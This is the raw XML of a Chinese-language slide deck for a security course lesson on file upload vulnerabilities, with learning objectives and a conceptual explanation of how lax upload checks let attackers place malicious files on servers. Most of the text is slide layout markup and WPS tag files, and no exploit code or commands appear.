                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>6.3 </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文件上传漏洞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Click="0" advTm="0">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3545"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4667"/>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34" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14834"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任务实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13884" y="6880"/>
                <a:ext cx="1622"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任务评价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algn="ctr"/>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p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1681480"/>
            <a:ext cx="10800080" cy="1615440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>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理解文件上传漏洞。</a:t>
            </a:r>
            <a:endParaRPr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lvl="1" indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>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掌握文件上传漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr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lvl="1" indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="0" checksum="0"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr 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掌握文件上传漏洞的防范措施。</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8800" y="712800"/>
            <a:ext cx="3855600" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【任务分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10800000" cy="2205990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" indent="609600" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传漏洞与SQL注入漏洞相比，其风险更大。本任务介绍文件上传漏洞、分析文件上传漏洞代码，讲解文件上传漏洞的利用方法，介绍防范文件上传漏洞的措施。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="485775" cy="388620"/>
            <a:chOff x="-9" y="201"/>
            <a:chExt cx="765" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="矩形 77"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>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2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="636" y="201"/>
              <a:ext cx="120" cy="611"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>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480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1681200"/>
            <a:ext cx="10800000" cy="4563110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="469900" indent="-469900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、文件上传漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上传漏洞，通常是由于对上传文件的类型、内容没有进行严格的过滤、检查，使得攻击者能够上传恶意文件到服务器，从而获得对服务器的控制权。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上传漏洞产生的原因是应用程序中存在上传功能，但是对上传的文件没有经过严格的合法性检验或者检验函数存在缺陷，导致攻击者可以上传</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件到服务器。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上传漏洞危害极大，这是因为利用文件上传漏洞可以直接将恶意代码上传到服务器上，可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等严重的后果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="485775" cy="388620"/>
            <a:chOff x="-9" y="201"/>
            <a:chExt cx="765" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="矩形 77"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9" y="201"/>
              <a:ext cx="578" cy="612"/>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custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="636" y="201"/>
              <a:ext cx="120" cy="611"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-245745" y="56515"/>
            <a:ext cx="5500370" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyP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lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件上传漏洞 </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8506,&quot;width&quot;:8450}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{5067a9ab-05c0-47b3-bcbd-7e266a552c95}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="607*121"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="81*187*607*121"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{69e93d95-1ae4-4307-897d-0756d5e4e1fa}"/>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BEAUTIFY_FLAG" val=""/>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1264.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1265.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1266.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1267.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1268.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1269.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30.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UNIT_TABLE_BEAUTIFY" val="smartTable{5067a9ab-05c0-47b3-bcbd-7e266a552c95}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="607*121"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="81*187*607*121"/>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 name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1346.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WPP_MARK_KEY" val="0b39fdc4-c042-4361-aa1e-da0ba7bcedd1"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiZDI2ODIyNmQ3MjZkNTFhMjE2MDQyYTc2YmE3MTVjNGIifQ=="/>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TABLE_BEAUTIFY" val="smartTable{b2345d61-a4c0-4a13-baa1-ddb153be4a98}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="623*309"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="199*191*623*309"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{5067a9ab-05c0-47b3-bcbd-7e266a552c95}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="607*121"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="81*187*607*121"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{55d037d9-9611-4af7-b44d-f41fd08399d6}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="806*78"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="67*177*806*78"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{55d037d9-9611-4af7-b44d-f41fd08399d6}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="806*78"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="67*177*806*78"/>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UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3920,&quot;width&quot;:13288}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{13d50c2a-427f-4989-b868-415269594d16}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="643*203"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="48*313*643*203"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{b8f29552-25f9-4700-8f16-9d50e07d956f}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="607*121"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="81*187*607*121"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{55d037d9-9611-4af7-b44d-f41fd08399d6}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="806*78"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="67*177*806*78"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{b8f29552-25f9-4700-8f16-9d50e07d956f}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="607*121"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="81*187*607*121"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{69e93d95-1ae4-4307-897d-0756d5e4e1fa}"/>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag686.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag687.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag688.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag689.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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag692.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">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KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag698.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag69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00.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag703.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag704.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag705.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag706.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag707.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag708.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag709.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BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag715.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag716.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag717.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag718.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag719.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20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag721.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag722.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag723.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag724.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag725.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag726.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag727.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag728.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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30.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag731.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag732.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag733.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag734.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag735.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag736.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag737.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag738.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag739.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40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag741.xml><?xml version="1.0" encoding="utf-8"?>
